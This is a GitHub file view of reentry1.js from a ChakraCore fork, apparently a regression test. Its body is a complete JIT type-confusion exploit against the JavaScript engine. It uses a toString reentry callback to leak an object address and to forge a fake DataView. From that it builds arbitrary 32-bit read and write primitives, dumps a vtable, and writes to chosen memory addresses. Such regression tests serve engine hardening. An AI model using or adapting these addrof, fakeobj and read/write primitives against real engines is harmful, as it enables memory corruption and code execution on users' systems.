forked from chakra-core/ChakraCore
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathreentry1.js
More file actions
118 lines (97 loc) · 2.52 KB
/
Copy pathreentry1.js
File metadata and controls
118 lines (97 loc) · 2.52 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
//-------------------------------------------------------------------------------------------------------
// Copyright (C) Microsoft Corporation and contributors. All rights reserved.
// Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
//-------------------------------------------------------------------------------------------------------
function go(){
a1 = [1.1,2.2]
a2 = [1.1,2.2]
ab = new ArrayBuffer(4)
tarr = new Uint8ClampedArray(ab)
fakeaddr = 0xaaaabbbbbbbb * 4.9406564584124654E-324;
function aaa(p1,p2,ii){
p1[0] = 1.1
p1[1] = 2.2
p2[0] = ii
p1[0] = fakeaddr
return ii
}
function bbb(p1,p2,ii){
p1[0] = 1.1
p1[1] = 2.2
p2[0] = ii
return p1[0]
}
for(var i=0; i <0x100000; i++) {
aaa(a1,tarr,3)
}
for(var i=0; i <0x100000; i++) {
bbb(a2,tarr,3)
}
var arr = new Array(
0x11111111,0x11111111,0x11111111,0x11111111,0x11111111,
0x11111111,0x11111111,0x11111111,0x11111111,0x11111111,
0x11111111,0x11111111,0x11111111,0x11111111,0x11111111
)
ab = new ArrayBuffer(0x100)
var farr = new Float64Array(ab)
var uarr = new Uint32Array(ab)
farr[0] = bbb(a2, tarr, {toString:function(){a2[0] = arr; return 9}})
var leakaddr = uarr[1]*0x100000000+uarr[0]
fakeaddr = (leakaddr+0x58) * 4.9406564584124654E-324;
aaa(a1, tarr, {toString:function(){a1[0] = {}; return 9}})
typeidaddr = leakaddr+0x58
abaddr = leakaddr+0x2c
function low32(v)
{
return (v % 0x100000000);
}
function high32(v)
{
return Math.floor(v / 0x100000000);
}
function toInt(v)
{
return v < 0x80000000 ? v : -(0x100000000 - v);
}
function toUint(v)
{
return v >= 0 ? v : (0x100000000 + v);
}
arr[0] = 56
arr[1] = 0
arr[2] = toInt(low32(typeidaddr))
arr[3] = toInt(high32(typeidaddr))
arr[4] = 0
arr[5] = 0
arr[6] = 0
arr[7] = 0
arr[8] = 0xabcd
arr[9] = 0
arr[10] = toInt(low32(abaddr))
arr[11] = toInt(high32(abaddr))
arr[12] = 0
arr[13] = 0
arr[14] = 0x41414141
arr[15] = 0x41414141
arr[16] = 0
arr[17] = 0
fakeobj = a1[0]
var read32 = function(addr){
arr[14] = toInt(low32(addr))
arr[15] = toInt(high32(addr))
return DataView.prototype.getUint32.call(fakeobj, 0, true)
}
var write32 = function(addr, v){
arr[14] = toInt(low32(addr))
arr[15] = toInt(high32(addr))
DataView.prototype.setUint32.call(fakeobj, 0, v, true)
}
WScript.Echo("vtable:" + read32(leakaddr+4).toString(16) + read32(leakaddr).toString(16))
arr.length = 0xffffffff
write32(leakaddr+0x44, 0xffffffff)
write32(leakaddr+0x48, 0xffffffff)
write32(0xaaaabbbbbbbb, 0)
}
try{
go()}catch(e){}
WScript.Echo('pass');